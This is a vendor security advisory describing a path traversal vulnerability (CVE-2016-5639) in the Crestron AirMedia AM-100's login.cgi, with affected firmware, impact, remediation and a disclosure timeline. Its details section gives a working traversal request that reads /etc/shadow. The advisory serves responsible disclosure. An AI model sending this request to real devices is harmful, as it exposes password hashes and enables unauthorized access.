Skip to content

Latest commit

 

History

History
90 lines (58 loc) · 3.49 KB

CLVA-2016-05-001.md

File metadata and controls

90 lines (58 loc) · 3.49 KB
Raw

[CLVA-2016-05-001]: Crestron AM-100 Path Traversal Vulnerability

Summary

Cylance identified a vulnerability in the Crestron AirMedia AM-100, which could allow an unauthenticated entity to read arbitrary files on affected devices. The unauthenticated user must be able to access the web server on the affected devices.

Product Description

The Crestron AirMedia AM-100 allows users to "wirelessly present PowerPoint®, Excel®, Word, and PDF documents, as well as photos, on the room display from their personal iOS® or Android™ mobile device" or desktop/laptop. (via http://www.crestron.com/microsites/airmedia-mobile-wireless-hd-presentations).

Affected Products

  • Crestron AirMedia AM-100 (firmware v1.1.1.11 - v1.2.1)

Impact

An unauthenticated entity may be able to read arbitrary files on the affected AM-100 as superuser ("root").

Vulnerability Information

  • Cylance Identifier: CLVA-2016-05-001
  • CVE Identifier: CVE-2016-5639

Description

A path traversal vulnerability exists in login.cgi (and possibly other binaries in the /home/boa/cgi-bin directory) on the AM-100 embedded web server. The src GET parameter passed to login.cgi specifies the relative path to a file for rendering, such as AwLoginDownload.html. However, the value of this parameter can specify an arbitrary path on the AM-100 filesystem.

Impact

The attacker may be able read the contents of unexpected files and expose sensitive data. Additionally, as the embedded web server runs as root, the attacker is unrestricted by filesystem permissions.

Attack Scenario

An unauthenticated entity with access to the AM-100 embedded web server could, for example, read the system's password file, then conduct a brute force password guessing attack in order to break into an account on the system.

Resolution

Crestron has released firmware version 1.4.0.13 to address this issue. Affected users should update the firmware of their AM-100 as soon as possible. Crestron partners can find the latest firmware at http://www.crestron.com/products/model/AM-100

Credit

  • Zach Lanier, Director of Research, Cylance

Additional Information

Details for CLVA-2016-05-001

  • Example of a benign/normal GET request for login.cgi:
GET http://[AM-100-ADDRESS]/cgi-bin/login.cgi?lang=en&src=AwLoginDownload.html HTTP/1.1
...
  • Example of expected response:
HTTP/1.1 200 OK
Content-Type: text/html
Date: Wed, 26 Oct 2005 19:07:53 GMT
Server: lighttpd/1.4.35-devel-4f1e285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Cache-control" content="no-cache">
<title>Crestron AirMedia</title>
...
  • Example of malicious request for /etc/shadow (system's password file):
http://[AM-100-ADDRESS]/cgi-bin/login.cgi?lang=en&src=../../../../../../../../etc/shadow
  • Response (password hash redacted for privacy reasons):
root:[HASH]:0:0:99999:7:::

CLVA-2016-05-001 Timeline

  • Discovery Date: 2016-05-12
  • Vendor Notification Date: 2016-05-19
  • CERT/CC Contact Date: 2016-05-27
  • Vendor Acknowledgement Date: 2016-06-06
  • Patch Release Date: 2016-08-01
  • Public Disclosure Date: 2016-08-01